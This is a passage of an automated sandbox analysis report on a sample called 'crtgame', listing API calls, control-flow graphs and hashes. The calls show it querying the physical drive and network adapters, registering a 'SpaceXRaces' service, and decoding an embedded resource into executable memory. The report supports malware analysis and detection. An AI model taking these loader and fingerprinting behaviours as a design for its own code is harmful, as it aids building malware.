                                                                                            • GetAdaptersInfo.IPHLPAPI(?,00000400,00000000,00000000,00000000), ref: 00401BA6
                                                                                            • FreeLibrary.KERNEL32(00401A3E), ref: 00401C24
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                                            • API String ID: 514930453-3667123677
                                                                                            • Opcode ID: a9615e917c7d8da21abece12906e102e054d7a7f96f05c26df3a9cf8b4b55db1
                                                                                            • Instruction ID: 19d1f7c7220f150a124496b0f3bded62544c7fcf715814b2fda3adae34ef3130
                                                                                            • Opcode Fuzzy Hash: a9615e917c7d8da21abece12906e102e054d7a7f96f05c26df3a9cf8b4b55db1
                                                                                            • Instruction Fuzzy Hash: 9D21B870944209AFEF21DFA5C9447EFBBB4EF45344F0440BAE504B22E1E7789A85CB69

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 91 401a58-401a80 CreateFileA 92 401a86-401a9a 91->92 93 401b4e-401b53 91->93 94 401aa1-401ac9 DeviceIoControl 92->94 95 401acb-401ad3 94->95 96 401afc-401b04 94->96 97 401ad5-401adb 95->97 98 401add-401ae2 95->98 99 401b06-401b0c call 402d06 96->99 100 401b0d-401b10 96->100 97->96 98->96 103 401ae4-401afa call 402d20 call 4018cc 98->103 99->100 101 401b12-401b15 100->101 102 401b43-401b4d CloseHandle 100->102 106 401b30-401b3d call 402cf8 101->106 107 401b17-401b20 GetLastError 101->107 102->93 103->96 106->94 106->102 107->102 109 401b22-401b25 107->109 109->106 112 401b27-401b2d 109->112 112->106
                                                                                            APIs
                                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000), ref: 00401A74
                                                                                            • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401ABB
                                                                                            • GetLastError.KERNEL32 ref: 00401B17
                                                                                            • CloseHandle.KERNELBASE(?), ref: 00401B46
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                            • String ID: \\.\PhysicalDrive0
                                                                                            • API String ID: 4026078076-1180397377
                                                                                            • Opcode ID: 4b276423cefb6535b93749f4a35407bbc40f2b1ddf316d430708a30b7fc217e3
                                                                                            • Instruction ID: 2ab55ed144571c3fa2fc985b9ad89e39486dc60e53794fabb09e903d28ee3d3f
                                                                                            • Opcode Fuzzy Hash: 4b276423cefb6535b93749f4a35407bbc40f2b1ddf316d430708a30b7fc217e3
                                                                                            • Instruction Fuzzy Hash: 9E317A71D00118AADB21EF96CD849EFBBB9EF40750F20817AE515B22A0E3785E45CF98

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetVersion.KERNEL32 ref: 00402F98
                                                                                              • Part of subcall function 004032AA: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402FD1,00000000), ref: 004032BB
                                                                                              • Part of subcall function 004032AA: HeapDestroy.KERNEL32 ref: 004032FA
                                                                                            • GetCommandLineA.KERNEL32 ref: 00402FE6
                                                                                            • GetStartupInfoA.KERNEL32(?), ref: 00403011
                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00403034
                                                                                              • Part of subcall function 0040308D: ExitProcess.KERNEL32 ref: 004030AA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                            • String ID:
                                                                                            • API String ID: 2057626494-0
                                                                                            • Opcode ID: 6973291a08a62e7008eca22fd321bc7397b23a4f1d73c5b2d439b14b6e22de47
                                                                                            • Instruction ID: 67841cd3009d396f381f20147254ff52d2e2d79fbc7827c85a5f588a1a3baf3d
                                                                                            • Opcode Fuzzy Hash: 6973291a08a62e7008eca22fd321bc7397b23a4f1d73c5b2d439b14b6e22de47
                                                                                            • Instruction Fuzzy Hash: 24217FB1800714AADB04AFA6DD0AA6E7BB9EB45704F10413EFA05BB2D1DB384850CB59

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 144 401c5b-401c7c GetWindowsDirectoryA 145 401cb7-401cbc 144->145 146 401c7e-401ca0 CreateFileA 144->146 146->145 147 401ca2-401cb1 GetFileTime CloseHandle 146->147 147->145
                                                                                            APIs
                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00401C74
                                                                                            • CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 00401C95
                                                                                            • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00401CA8
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00401CB1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateDirectoryHandleTimeWindows
                                                                                            • String ID:
                                                                                            • API String ID: 87451460-0
                                                                                            • Opcode ID: e2397ba6e5c18c7e638a70f9a661d1ac9407ea32cfd96cdb9d4eb31bc9736a0d
                                                                                            • Instruction ID: cc4b8a8173e68006100f6bb5cfe5cbca554eec38252bcd741f722b6c7c402e1e
                                                                                            • Opcode Fuzzy Hash: e2397ba6e5c18c7e638a70f9a661d1ac9407ea32cfd96cdb9d4eb31bc9736a0d
                                                                                            • Instruction Fuzzy Hash: 7CF0E27668021077E6209B359E8DFCB3AAD9BC6B60F010134BB46F21D0D6B49551C6B4

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 148 4041cb-4041d5 149 4041d7-4041e2 GetCurrentProcess TerminateProcess 148->149 150 4041e8-4041fe 148->150 149->150 151 404200-404207 150->151 152 40423c-404250 call 404264 150->152 154 404209-404215 151->154 155 40422b-40423b call 404264 151->155 161 404262-404263 152->161 162 404252-40425c ExitProcess 152->162 158 404217-40421b 154->158 159 40422a 154->159 155->152 163 40421d 158->163 164 40421f-404228 158->164 159->155 163->164 164->158 164->159
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(?,?,004041B6,?,00000000,00000000,00403049,00000000,00000000), ref: 004041DB
                                                                                            • TerminateProcess.KERNEL32(00000000,?,004041B6,?,00000000,00000000,00403049,00000000,00000000), ref: 004041E2
                                                                                            • ExitProcess.KERNEL32 ref: 0040425C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                            • String ID:
                                                                                            • API String ID: 1703294689-0
                                                                                            • Opcode ID: 78841f2a515f296da85e0e90675676ac3a79d5512f1734095c42bbe5f9917e88
                                                                                            • Instruction ID: 04da20acb35bf9441239f1d62556dfb4fa7ea4fed694bd47aa7006e356793b78
                                                                                            • Opcode Fuzzy Hash: 78841f2a515f296da85e0e90675676ac3a79d5512f1734095c42bbe5f9917e88
                                                                                            • Instruction Fuzzy Hash: 8E01D2B2648300DEDA10AF65FE44A0A7BA4FBD4790B10857FF281771E0D739A851CA2E

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 165 4032aa-4032c8 HeapCreate 166 403300-403302 165->166 167 4032ca-4032d7 call 403162 165->167 170 4032e6-4032e9 167->170 171 4032d9-4032e4 call 403307 167->171 172 403303-403306 170->172 173 4032eb call 403b58 170->173 177 4032f0-4032f2 171->177 173->177 177->172 178 4032f4-4032fa HeapDestroy 177->178 178->166
                                                                                            APIs
                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402FD1,00000000), ref: 004032BB
                                                                                              • Part of subcall function 00403162: GetVersionExA.KERNEL32 ref: 00403181
                                                                                            • HeapDestroy.KERNEL32 ref: 004032FA
                                                                                              • Part of subcall function 00403307: HeapAlloc.KERNEL32(00000000,00000140,004032E3,000003F8), ref: 00403314
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocCreateDestroyVersion
                                                                                            • String ID:
                                                                                            • API String ID: 2507506473-0
                                                                                            • Opcode ID: 0b849b835aecce10534f7c8868f1023d210904a4762ffb57ab141a925f8bfac6
                                                                                            • Instruction ID: 5e09d6e980c9b6bd0e9d6ae44655ccf46c8d477683af571ce1b4adb312d05453
                                                                                            • Opcode Fuzzy Hash: 0b849b835aecce10534f7c8868f1023d210904a4762ffb57ab141a925f8bfac6
                                                                                            • Instruction Fuzzy Hash: C5F065306543019AEB201F309E4AB2A3EA89754757F14483BF841FD1D1EF7D8691950E

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • RegisterServiceCtrlHandlerA.ADVAPI32(SpaceXRaces,Function_000023D3), ref: 00402436
                                                                                            • SetServiceStatus.ADVAPI32(0040A058), ref: 00402495
                                                                                            • GetLastError.KERNEL32 ref: 00402497
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004024A4
                                                                                            • GetLastError.KERNEL32 ref: 004024C5
                                                                                            • SetServiceStatus.ADVAPI32(0040A058), ref: 004024F5
                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00002351,00000000,00000000,00000000), ref: 00402501
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040250A
                                                                                            • CloseHandle.KERNEL32 ref: 00402516
                                                                                            • SetServiceStatus.ADVAPI32(0040A058), ref: 0040253F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                            • String ID: SpaceXRaces
                                                                                            • API String ID: 3346042915-182686438
                                                                                            • Opcode ID: cdb2bee97ed7bb97cf955b6f798025c993403a3b9e37aa79489956d55700b49b
                                                                                            • Instruction ID: 823e7604a9f11b62abb5769871faa090ae10b28c447e591ffcb139ee33df3efb
                                                                                            • Opcode Fuzzy Hash: cdb2bee97ed7bb97cf955b6f798025c993403a3b9e37aa79489956d55700b49b
                                                                                            • Instruction Fuzzy Hash: F821A9B0841348EBD2119F36FF48E177FA8EB96719715813AE505B22B0C7BA0464DF2E

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 212 405b6f-405b9d 213 405be5-405be8 212->213 214 405b9f-405bb9 LCMapStringW 212->214 217 405bfa-405c02 213->217 218 405bea-405bf7 call 405d93 213->218 215 405bc3-405bd5 LCMapStringA 214->215 216 405bbb-405bc1 214->216 219 405bdb 215->219 220 405cfd 215->220 216->213 222 405c21-405c24 217->222 223 405c04-405c1c LCMapStringA 217->223 218->217 219->213 225 405cff-405d10 220->225 222->220 226 405c2a-405c2d 222->226 223->225 227 405c37-405c5b MultiByteToWideChar 226->227 228 405c2f-405c34 226->228 227->220 229 405c61-405c95 call 402da0 227->229 228->227 229->220 233 405c97-405cae MultiByteToWideChar 229->233 233->220 234 405cb0-405cc9 LCMapStringW 233->234 234->220 235 405ccb-405ccf 234->235 236 405d11-405d47 call 402da0 235->236 237 405cd1-405cd4 235->237 236->220 244 405d49-405d5f LCMapStringW 236->244 238 405cda-405cdd 237->238 239 405d8c-405d8e 237->239 238->220 241 405cdf-405cf7 LCMapStringW 238->241 239->225 241->220 241->239 244->220 245 405d61-405d66 244->245 246 405d68-405d6a 245->246 247 405d6c-405d6f 245->247 248 405d72-405d86 WideCharToMultiByte 246->248 247->248 248->220 248->239
                                                                                            APIs
                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,004065F4,00000001,00000000,00000000,00000103,00000001,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000), ref: 00405BB1
                                                                                            • LCMapStringA.KERNEL32(00000000,00000100,004065F0,00000001,00000000,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BCD
                                                                                            • LCMapStringA.KERNEL32(?,?,?,?,N@ ,?,00000103,00000001,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000), ref: 00405C16
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000), ref: 00405C4E
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CA6
                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CBC
                                                                                            • LCMapStringW.KERNEL32(?,?,?,00000000,N@ ,?,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CEF
                                                                                            • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405D57
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: String$ByteCharMultiWide
                                                                                            • String ID: N@
                                                                                            • API String ID: 352835431-2588724849
                                                                                            • Opcode ID: 50f7acbb545500e936848391daa4b4f79838f587710a5a8d37350ffe5be9aa75
                                                                                            • Instruction ID: 59135ce53bc3b83908b259842d99def5e9dba23692ba7c4f82a52b333c41bde6
                                                                                            • Opcode Fuzzy Hash: 50f7acbb545500e936848391daa4b4f79838f587710a5a8d37350ffe5be9aa75
                                                                                            • Instruction Fuzzy Hash: 69516B31500609ABDF218F54CD45E9F7BB9EB48710F10813AF912B12A0D33A9961EF69

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 249 4058a7-4058b2 250 4058b4-4058c3 LoadLibraryA 249->250 251 4058f6-4058fd 249->251 252 4058c5-4058da GetProcAddress 250->252 253 40592c-40592e 250->253 254 405915-405921 251->254 255 4058ff-405905 251->255 252->253 257 4058dc-4058f1 GetProcAddress * 2 252->257 256 405928-40592b 253->256 254->256 255->254 259 405907-40590e 255->259 257->251 259->254 260 405910-405913 259->260 260->254
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404D6D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406528,?,00406578,?,?,?,Runtime Error!Program: ), ref: 004058B9
                                                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004058D1
                                                                                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004058E2
                                                                                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004058EF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                            • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll$xe@
                                                                                            • API String ID: 2238633743-4073082454
                                                                                            • Opcode ID: ee458f46fe1812a05d91eb71287a3930c9b5d9979fa11f14182ddc6a57f11331
                                                                                            • Instruction ID: 33924f41f48bfa595f86144282b4f53d1c2fc39b1daf6c652de04afaa2dac454
                                                                                            • Opcode Fuzzy Hash: ee458f46fe1812a05d91eb71287a3930c9b5d9979fa11f14182ddc6a57f11331
                                                                                            • Instruction Fuzzy Hash: F4017171640711EFC7109FB5AD8091B3BE8EA887A0712043FA505F23E2DA7988619F2D

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 262 405dbe-405ded 263 405e2d-405e30 262->263 264 405def-405e05 GetStringTypeW 262->264 265 405e32-405e37 263->265 266 405e56-405e59 263->266 267 405e07-405e09 264->267 268 405e0b-405e1f GetStringTypeA 264->268 269 405e39 265->269 270 405e3e-405e51 GetStringTypeA 265->270 271 405ef3 266->271 272 405e5f-405e62 266->272 273 405e28 267->273 268->271 274 405e25-405e27 268->274 269->270 275 405ef5-405f06 270->275 271->275 276 405e64-405e69 272->276 277 405e6c-405e8e MultiByteToWideChar 272->277 273->263 274->273 276->277 277->271 278 405e90-405ec8 call 402da0 call 402ca0 277->278 278->271 284 405eca-405ee1 MultiByteToWideChar 278->284 284->271 285 405ee3-405ef1 GetStringTypeW 284->285 285->275
                                                                                            APIs
                                                                                            • GetStringTypeW.KERNEL32(00000001,004065F4,00000001,00000000,00000103,00000001,00000000,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DFD
                                                                                            • GetStringTypeA.KERNEL32(00000000,00000001,004065F0,00000001,?,?,00000000,00000000,00000001), ref: 00405E17
                                                                                            • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E4B
                                                                                            • MultiByteToWideChar.KERNEL32(N@ ,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E83
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00405ED9
                                                                                            • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00405EEB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: StringType$ByteCharMultiWide
                                                                                            • String ID: N@
                                                                                            • API String ID: 3852931651-2588724849
                                                                                            • Opcode ID: b846b538efdd308b61092c0b21f0a934ff7444516eeaa1663e1030bce46bb4c8
                                                                                            • Instruction ID: efd9f9df0c83a1a94f90d52e1acc00adac850a8b7f95784ade7c71040f2db77a
                                                                                            • Opcode Fuzzy Hash: b846b538efdd308b61092c0b21f0a934ff7444516eeaa1663e1030bce46bb4c8
                                                                                            • Instruction Fuzzy Hash: 6E414C72900619AFCF209F94DD85EAF7B78FB08750F10443AF912B2290D7398A619B99
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404CB6
                                                                                            • GetStdHandle.KERNEL32(000000F4,00406528,00000000,?,00000000,00000000), ref: 00404D8C
                                                                                            • WriteFile.KERNEL32(00000000), ref: 00404D93
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$HandleModuleNameWrite
                                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                            • API String ID: 3784150691-4022980321
                                                                                            • Opcode ID: 3f183e7b97676ec7bc44c608dee57f0da837cd1f80663b04b7f3573c67123c93
                                                                                            • Instruction ID: 66213c8598c100419aca2a23d32cbd7848d5265dc6afe1337dc7fe815477c880
                                                                                            • Opcode Fuzzy Hash: 3f183e7b97676ec7bc44c608dee57f0da837cd1f80663b04b7f3573c67123c93
                                                                                            • Instruction Fuzzy Hash: 4B31A7B2600218BEEF20EA60DD49FDA376CEF85304F1005BBF545F61D1D6B8AD548A5D
                                                                                            APIs
                                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 0040477B
                                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 0040478F
                                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 004047BB
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FF6), ref: 004047F3
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FF6), ref: 00404815
                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402FF6), ref: 0040482E
                                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 00404841
                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040487F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 1823725401-0
                                                                                            • Opcode ID: 5b86ae991fad7257a9556b843b73270ba3d506a60895f98d1aae2807b58742cd
                                                                                            • Instruction ID: d94799acc24e98fca2fbef921ce91b810f6c8713fa78e77f5a065486d65e4eae
                                                                                            • Opcode Fuzzy Hash: 5b86ae991fad7257a9556b843b73270ba3d506a60895f98d1aae2807b58742cd
                                                                                            • Instruction Fuzzy Hash: CA31F2F75042A55ED7207BB59C8483B76DCE6C5358711893FFA42F3280E6398C4186A9
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(00000000,0000000A,00000000), ref: 00402011
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 0040201D
                                                                                            • SizeofResource.KERNEL32(00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 0040202A
                                                                                            • LoadResource.KERNEL32(00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 00402044
                                                                                            • LockResource.KERNEL32(00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 0040204B
                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 00402056
                                                                                            • GetTickCount.KERNEL32 ref: 00402092
                                                                                            • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,004023A6,00000190,00409F34), ref: 004020F8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                            • String ID:
                                                                                            • API String ID: 564119183-0
                                                                                            • Opcode ID: f1ea5436b47a97949242679e62fd8c16215760983c098ca12679752f31ddac83
                                                                                            • Instruction ID: ecab55d02aed30cb2302f8ec7062e98c1eb40003726056bc5c009be87fd8cf01
                                                                                            • Opcode Fuzzy Hash: f1ea5436b47a97949242679e62fd8c16215760983c098ca12679752f31ddac83
                                                                                            • Instruction Fuzzy Hash: 1C313C71A003456FDF118BB99E88AAF7F78EF49344B10803AFA46F72C1D6748940C768
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,759230D0,00000000,?,0040238C,00000000,?,00000000), ref: 004021E3
                                                                                            • GetLastError.KERNEL32(?,?,?,?,0040238C,00000000), ref: 00402298
                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000000,?,?,?,?,0040238C,00000000), ref: 004022A5
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004022E0
                                                                                            • Sleep.KERNEL32(000003E8,?,?,?,?,0040238C,00000000), ref: 00402336
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressAllocErrorLastLibraryLoadProcSleepVirtual
                                                                                            • String ID: (
                                                                                            • API String ID: 2871813557-3887548279
                                                                                            • Opcode ID: 7f0dd8bc027646a7730874866425c3d0ac7d12c98f25a8e59b63077f83e1171d
                                                                                            • Instruction ID: fa8a78d08e5b147245ce613c51b7eec45b3ed4bb95c194ee9eab5a02c05580c9
                                                                                            • Opcode Fuzzy Hash: 7f0dd8bc027646a7730874866425c3d0ac7d12c98f25a8e59b63077f83e1171d
                                                                                            • Instruction Fuzzy Hash: DE516375A00215EFDB14CF98C984BAEB7B5FF44304F2480AAE905AB3C1D7B5EA51CB94
                                                                                            APIs
                                                                                            • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,004032F0), ref: 00403B79
                                                                                            • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032F0), ref: 00403B9D
                                                                                            • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,004032F0), ref: 00403BB7
                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,004032F0), ref: 00403C78
                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,004032F0), ref: 00403C8F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual$FreeHeap
                                                                                            • String ID: @q@$@q@
                                                                                            • API String ID: 714016831-1591251108
                                                                                            • Opcode ID: 53fa90f427eeffaf6ecb660fffee8fa42559a5708230ede92574a81e60caacf4
